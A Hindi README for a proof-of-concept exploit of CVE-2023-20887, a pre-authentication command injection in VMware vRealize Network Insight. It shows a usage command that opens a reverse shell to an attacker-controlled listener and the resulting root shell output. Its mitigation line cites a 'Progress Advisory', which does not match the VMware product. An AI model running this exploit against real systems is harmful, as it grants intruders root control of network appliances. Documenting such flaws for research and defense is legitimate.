
VMWare vRealize Network Insight Pre-Authenticated RCE (CVE-2023-20887)
CVE-2023-20887 के लिए POC - VMWare Aria Operations for Networks (vRealize Network Insight) में बिना प्रमाणीकरण के RCE
इस कमजोरी का मूल कारण विश्लेषण मेरे ब्लॉग पर उपलब्ध है: https://kushagraojha.medium.com/vmware-vrealize-network-insight-cve-2023-20887-193f3c3d30a0
VMWare Aria Operations for Networks (vRealize Network Insight) Apache Thrift RPC इंटरफ़ेस के माध्यम से उपयोगकर्ता इनपुट स्वीकार करते समय कमांड इंजेक्शन के प्रति संवेदनशील है। यह कमजोरी एक दूरस्थ अप्रमाणित हमलावर को अंतर्निहित ऑपरेटिंग सिस्टम पर root उपयोगकर्ता के रूप में मनमानी कमांड निष्पादित करने की अनुमति देती है। RPC इंटरफ़ेस एक रिवर्स प्रॉक्सी द्वारा संरक्षित है जिसे बायपास किया जा सकता है। VMware ने इस मुद्दे की गंभीरता को क्रिटिकल श्रेणी में आंका है, जिसका अधिकतम CVSSv3 बेस स्कोर 9.8 है। एक दुर्भावनापूर्ण अभिकर्ता उपकरण पर 'root' के संदर्भ में रिमोट कोड निष्पादन प्राप्त कर सकता है। VMWare 6.x संस्करण संवेदनशील हैं।
python CVE-2023-20887.py --url https://192.168.116.100 --attacker 192.168.116.1:1337
(*) Starting handler
(+) Received connection from 192.168.116.100
(+) pop thy shell! (it's ready)
sudo bash
id
uid=0(root) gid=0(root) groups=0(root)
hostname
vrni-platform-release
नवीनतम संस्करण में अपडेट करें या Progress Advisory के निर्देशों का पालन करके कमजोरी को कम करें
यह सॉफ्टवेयर विशुद्ध रूप से शैक्षणिक अनुसंधान और प्रभावी रक्षात्मक तकनीकों के विकास के उद्देश्यों के लिए बनाया गया है, और इसका उद्देश्य स्पष्ट रूप से अधिकृत किए गए सिस्टमों को छोड़कर किसी भी सिस्टम पर हमला करने के लिए उपयोग नहीं किया जाना है। परियोजना अनुरक्षक सॉफ्टवेयर के दुरुपयोग के लिए जिम्मेदार या उत्तरदायी नहीं हैं। जिम्मेदारी से उपयोग करें।